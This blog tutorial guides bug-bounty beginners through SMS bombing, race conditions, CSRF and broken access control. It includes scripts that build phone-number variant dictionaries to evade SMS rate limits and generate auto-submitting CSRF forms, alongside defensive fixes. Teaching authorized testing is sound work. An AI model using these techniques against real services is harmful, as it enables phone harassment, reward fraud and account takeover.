言心吾のBlog (by 言心吾)

吾言为心声 (My words are the voice of my heart)

How Beginners of SRC Mining Can Quickly Find Their First Vulnerability (Part 1)

How a beginner can quickly submit a first valid vulnerability to an SRC (Security Response Center) and earn a bounty is something many newcomers ask about. This article recommends several common and relatively easy-to-find vulnerability classes and gives concrete hunting ideas and methods for each, so you can get started quickly. As the saying goes, "If you can't find a high-risk vulnerability, make do with a low-risk one."

SMS Bombing Vulnerability#

What is an SMS bombing vulnerability?#

An SMS bombing vulnerability is an SMS-sending interface (verification code, registration, login, password reset) that does not limit how often, or how many times, a message can be sent to the same number. An attacker abuses it to flood a victim's phone with repeated or junk messages, until the phone is effectively unusable and the platform's SMS budget is burned.

How to exploit an SMS bombing vulnerability?#

  1. Target selection: Choose pages that send SMS verification codes, such as registration, login, and password recovery.
  2. Interface analysis: Capture the traffic with a proxy (such as Burp Suite), and identify the request that triggers the SMS so you can replay it from the Repeater.
  3. Send tests: Replay the request several times and observe whether anything limits the frequency or count (per number, per IP, per session, per image captcha), and whether codes actually arrive.

When testing for SMS bombing, I recommend not starting with raw concurrency (firing many copies of the same request at once), because that tends to get the phone number blocked by the backend or the gateway. Try the bypass techniques below first; they make each request look like a different number to the rate limiter.

Bypass techniques#

  1. Bypass by adding spaces, 86, 086, 0086, +86, 0, 00, \r, \n, or special characters before and after the phone number parameter; a limiter that keys on the raw string treats each variant as a new number, while the gateway still delivers to the same phone.

%20 +86 187111111
1871111%20 1871111 1871111\n
phone=1871111,1871111,187
phone=18711&phone=187111

  2. Modify cookies, request parameters, or the response (for example, if the front end decides whether the code was "already sent" based only on the response body, change the response and resend).
  3. Append a digit, e.g. 138888888889 (12 digits): the SMS gateway keeps only the first 11 digits, so the code still reaches 13888888888 while the limiter sees a new number each time.
  4. Use encodings the backend decodes before use, such as URL encoding of the digits, to bypass an exact-match check.

Here is a real case (screenshots omitted): the phone number parameter was mutated with one of the wrappers above and the request was accepted.
[screenshot: mutated request and the successful response]
Then a dictionary of such variants was written, the request was replayed once per entry, and multiple verification codes arrived on the same phone.
[screenshot: the phone receiving several codes]
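The following script, added as a worked example (not from the original post), builds the kind of variant dictionary described above and then shows why the bypass works: it counts how many separate rate-limit buckets the dictionary lands in when the limiter keys on the raw parameter versus on the normalized number the gateway will actually dial. The target number, the prefix/suffix set and the normalization rules are assumptions for the demo.

```python
import itertools
import re
from urllib.parse import unquote

# Constructed placeholder number; the "1871111..." values on the page are truncated.
TARGET = "18700000000"

# Wrappers from the page's bypass list: whitespace, country-code forms (86, 086,
# 0086, +86), trunk zeros (0, 00) and CR/LF, placed before and after the number.
PREFIXES = ["", " ", "%20", "86", "086", "0086", "+86", "0", "00", "\r", "\n"]
SUFFIXES = ["", " ", "%20", "\r", "\n", "\r\n"]


def variants(number: str) -> list[str]:
    """Build the dictionary an Intruder-style run would iterate over.

    Every entry still delivers to the same subscriber once the gateway
    normalizes it, so a limiter keyed on the raw string sees each entry
    as a brand-new number.
    """
    out = [pre + number + suf for pre, suf in itertools.product(PREFIXES, SUFFIXES)]
    out.append(number + "9")                      # 12 digits: gateway keeps the first 11
    out.append(number + "," + number)             # list form: some backends send to each element
    out.append("".join(f"%{ord(c):02X}" for c in number))  # fully percent-encoded digits
    return out


def naive_key(value: str) -> str:
    """Rate-limit key of a weak implementation: the parameter exactly as received."""
    return value


def normalized_key(value: str) -> str:
    """Rate-limit key a hardened implementation should use: the number the gateway dials.
    (Assumed normalization: decode, trim, keep digits, strip country/trunk prefix, cut to 11.)"""
    digits = re.sub(r"\D", "", unquote(value).strip())   # drop '+', spaces, CR/LF, commas
    for prefix in ("0086", "086", "86", "00", "0"):      # longest match first
        if digits.startswith(prefix) and len(digits) - len(prefix) >= 11:
            digits = digits[len(prefix):]
            break
    return digits[:11]                                   # what an 11-digit gateway keeps


def distinct_keys(key_fn, number: str = TARGET) -> int:
    """How many separate rate-limit buckets the dictionary lands in under key_fn."""
    return len({key_fn(v) for v in variants(number)})


if __name__ == "__main__":
    print("dictionary size      :", len(variants(TARGET)))
    print("buckets, raw key     :", distinct_keys(naive_key))
    print("buckets, normalized  :", distinct_keys(normalized_key))
```

Feed the `variants()` output to Intruder as a simple list payload (with URL-encoding of the payload turned off, otherwise the CR/LF and `%20` entries are double-encoded). On the defensive side, the point of `normalized_key()` is that the limiter and the gateway must agree on what "the same number" means; the same normalization should also back the per-number counter and the cooldown timer.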

Concurrency Vulnerability#

What is a concurrency vulnerability?#

A concurrency vulnerability (a race condition) occurs when a system does not handle simultaneous requests correctly: several requests pass the same check before any of them has recorded its result, so an operation meant to happen once happens many times, leaving data inconsistent or the system in an abnormal state.

How to exploit a concurrency vulnerability?#

Everything can be concurrent.

The main test scenarios for concurrency are daily sign-in, daily points rewards, likes, comment likes, coupon or red-packet claims, and similar "once per user" actions: send many identical requests at the same instant and check whether the server honours more than one of them.

If you want to raise the severity of a concurrency finding, tie it to money or show the vendor that it can be exploited to gain something at the platform's expense (extra points, duplicate coupons, repeated withdrawals). A concurrency bug with a demonstrated financial impact is what earns a high bounty.

Burp Suite's Turbo Intruder extension (the go-to tool for concurrency tests) can queue many copies of a request and release them together.
Search online for its specific usage.
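As an added illustration (not code from the original post), the simulation below models the daily sign-in scenario just described: twenty "requests" are held at a barrier and released at the same instant, which is what Turbo Intruder's gate does against a real server. The vulnerable handler checks the sign-in flag and then updates it after a simulated database round trip; the safe handler performs the check and the update as one atomic step. The handler names, the 10-point reward and the 50 ms delay are assumptions for the demo.

```python
import threading
import time


class Account:
    """In-memory stand-in for the user row: points balance plus today's sign-in flag.
    The lock models the database's ability to check and update in one statement."""

    def __init__(self) -> None:
        self.points = 0
        self.signed_in_today = False
        self.lock = threading.Lock()


def vulnerable_sign_in(acct: Account) -> None:
    """Check-then-act with a window: SELECT the flag now, UPDATE it a little later."""
    if not acct.signed_in_today:
        time.sleep(0.05)          # simulated round trip between the SELECT and the UPDATE
        acct.signed_in_today = True
        acct.points += 10


def safe_sign_in(acct: Account) -> None:
    """Check and act atomically, the equivalent of
    UPDATE users SET signed_in_today=1, points=points+10 WHERE id=? AND signed_in_today=0
    followed by inspecting the affected-row count."""
    with acct.lock:
        if acct.signed_in_today:
            return
        time.sleep(0.05)          # same latency, but nobody else can pass the check meanwhile
        acct.signed_in_today = True
        acct.points += 10


def fire_concurrently(handler, n: int = 20) -> int:
    """Release n sign-in requests at the same instant (what Turbo Intruder's gate does)
    and return the points balance afterwards; a correct server ends at exactly 10."""
    acct = Account()
    gate = threading.Barrier(n)

    def worker() -> None:
        gate.wait()               # every thread blocks here until all n have arrived
        handler(acct)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.points


if __name__ == "__main__":
    print("vulnerable handler, 20 parallel sign-ins ->", fire_concurrently(vulnerable_sign_in), "points")
    print("safe handler,       20 parallel sign-ins ->", fire_concurrently(safe_sign_in), "points")
```

When you report this class of bug, the before/after balance is the evidence: one request should move the counter once, and the replay shows it moving twenty times. The fix on the server side is not "add a lock in application code" so much as making the state change conditional and atomic at the data store (a conditional UPDATE, a unique constraint on (user, day), or an idempotency key), because application-level locks do not survive multiple app instances.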

CSRF (Cross-Site Request Forgery)#

What is a CSRF vulnerability?#

A CSRF vulnerability lets an attacker make a victim's browser send a forged request to a site where the victim is logged in, so the site performs a state-changing operation the victim never intended; it works because the browser attaches the session cookie automatically and the site does not verify that the request originated from its own pages.

How to exploit a CSRF vulnerability?#

  1. Find critical operations: Choose state-changing operations that require the user to be logged in, such as changing the password or e-mail, binding a phone number, or submitting an order.
  2. Construct the malicious request: Build an HTML page with a form (or script) that reproduces the request and submits it automatically, then lure the victim into opening it.
  3. Verify the vulnerability: Open the malicious page in a browser that is logged in to the target and confirm that the operation was executed. A request that carries a per-session token which the server actually validates, or whose session cookie is `SameSite=Strict`/`Lax` for a cross-site POST, will fail this step.
  • Tool: the CSRF PoC generator in Burp Suite (Engagement tools)
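The script below is an added example (not from the original post, and not Burp's own code) of what the PoC generator does: it parses a captured form-encoded POST and emits an auto-submitting HTML form that replays it cross-site. It also flags parameters that look like anti-CSRF tokens, since a static PoC will only work against those if the server does not validate the token. The captured request is constructed, and the token-name heuristic is an assumption.

```python
from html import escape
from urllib.parse import parse_qsl

# Constructed sample capture: a password-change request as seen in Burp's proxy history.
RAW_REQUEST = (
    "POST /account/change-password HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 40\r\n"
    "\r\n"
    "new_password=Hacked123&confirm=Hacked123"
)

# Parameter names that usually carry a synchronizer token (assumed heuristic).
TOKEN_HINTS = ("csrf", "xsrf", "token", "nonce")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def build_poc(raw: str, scheme: str = "https") -> tuple[str, list[str]]:
    """Return (html, warnings): an auto-submitting form that replays the request
    cross-site, plus warnings about fields that look like anti-CSRF tokens."""
    req = parse_request(raw)
    ctype = req["headers"].get("content-type", "")
    if req["method"] != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        raise ValueError("this generator only handles form-encoded POST bodies")
    fields = parse_qsl(req["body"], keep_blank_values=True)
    warnings = [
        f"field {name!r} looks like an anti-CSRF token; the PoC only works if the server ignores it"
        for name, _ in fields
        if any(hint in name.lower() for hint in TOKEN_HINTS)
    ]
    action = f"{scheme}://{req['headers']['host']}{req['path']}"
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(n, quote=True)}" value="{escape(v, quote=True)}">'
        for n, v in fields
    )
    html = (
        "<html><body>\n"
        f'  <form id="csrf" action="{escape(action, quote=True)}" method="POST">\n'
        f"{inputs}\n"
        "  </form>\n"
        '  <script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>\n"
    )
    return html, warnings


if __name__ == "__main__":
    page, notes = build_poc(RAW_REQUEST)
    print(page)
    for note in notes:
        print("WARNING:", note)
```

Host the generated page on a domain you control and open it in a browser that is logged in to the target; if the password changes, the endpoint has no effective CSRF defence. Note what this PoC cannot do: it cannot send a JSON body or custom headers (a plain form only sends form encodings without a preflight), and it does nothing against a validated per-session token, a `SameSite` session cookie, or an Origin/Referer check, which is exactly the set of defences you should confirm are absent before reporting.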

Privilege Escalation Vulnerability#

What is a privilege escalation vulnerability?#

A privilege escalation (broken access control) vulnerability is one where a user performs an operation, or reads data, that their permissions do not allow: vertically, when an ordinary user reaches functions reserved for administrators or other privileged roles, or horizontally, when a user reaches another user's data or actions at the same privilege level (for example by changing a user ID in a request).

How to exploit a privilege escalation vulnerability?#

  1. Analyze privilege control: Understand how the system enforces permissions and identify what each role is supposed to be able to do.
  2. Simulate low-privilege users: Log in as a low-privilege user and try to call high-privilege functions or fetch restricted resources directly.
  3. Manual and automated testing: Manually modify identifiers in requests, such as user IDs, order IDs and role IDs, or replay requests captured from a high-privilege session with a low-privilege session's cookie, and check whether the server still serves them.
  • Tool: the xia_yue extension for Burp Suite
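The following is an added example (not from the original post, and not the xia_yue extension's code) of the differential replay that such extensions automate: every request captured under a privileged session is replayed with a low-privilege session and with no session at all, and the responses are compared. A tiny mock application stands in for the target; it has a working role check on the admin endpoint and a deliberate missing ownership check on the per-user endpoint. Sessions, users, paths and the classification labels are all assumptions for the demo.

```python
from dataclasses import dataclass

# Constructed fixtures: two sessions and a tiny user table standing in for the target app.
SESSIONS = {
    "admin-session": {"uid": 1, "role": "admin"},
    "user-session": {"uid": 2, "role": "user"},
}
USERS = {1: "admin@example.test", 2: "bob@example.test", 3: "alice@example.test"}


@dataclass
class Request:
    method: str
    path: str
    session: str      # value of the session cookie, "" for no cookie


def mock_app(req: Request, enforce_owner: bool = False) -> tuple[int, str]:
    """Minimal target. /api/admin/users has a vertical (role) check; /api/users/<id>
    has no ownership check unless enforce_owner is set, i.e. a deliberate horizontal hole."""
    who = SESSIONS.get(req.session)
    if who is None:
        return 401, "login required"
    if req.path == "/api/admin/users":
        if who["role"] != "admin":
            return 403, "forbidden"
        return 200, ",".join(USERS.values())
    if req.path.startswith("/api/users/"):
        uid = int(req.path.rsplit("/", 1)[1])
        if enforce_owner and uid != who["uid"] and who["role"] != "admin":
            return 403, "forbidden"          # the check the vulnerable version is missing
        if uid in USERS:
            return 200, USERS[uid]
        return 404, "no such user"
    return 404, "not found"


def check_access_control(path: str, high_session: str, low_session: str, app=mock_app) -> str:
    """Replay a request captured under a privileged session with a low-privilege session
    and with no session, and classify the outcome the way authorization plugins do."""
    high = app(Request("GET", path, high_session))
    if high[0] != 200:
        return "BASELINE-NOT-200"            # nothing to compare against
    if app(Request("GET", path, "")) == high:
        return "BYPASSED-UNAUTHENTICATED"    # endpoint needs no login at all
    low = app(Request("GET", path, low_session))
    if low == high:
        return "BYPASSED"                    # same status and body: no authorization check
    if low[0] in (401, 403):
        return "ENFORCED"
    return "REVIEW"                          # 200 with a different body, or odd status: look manually


if __name__ == "__main__":
    for path in ("/api/admin/users", "/api/users/1", "/api/users/3"):
        print(f"{path:<20} {check_access_control(path, 'admin-session', 'user-session')}")
    fixed = lambda r: mock_app(r, enforce_owner=True)
    print("/api/users/1 after fix:", check_access_control("/api/users/1", "admin-session", "user-session", app=fixed))
```

Two caveats when you read such results against a real target. A 200 on a resource the low-privilege user legitimately owns is expected, so for horizontal tests replay identifiers that belong to someone else (as `/api/users/1` and `/api/users/3` do above). And an identical response is only strong evidence when the body is specific to the resource; endpoints that return generic pages or empty lists for everyone need a manual look, which is what the `REVIEW` bucket is for.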

Conclusion#

By mastering the hunting techniques for common vulnerability classes such as SMS bombing, concurrency, CSRF, and broken access control, beginners can find their first valid vulnerability much sooner. Beyond the theory, real progress comes from a lot of hands-on practice and from writing down what worked and what did not after each attempt. I hope this article helps, and I wish you success on your SRC journey!
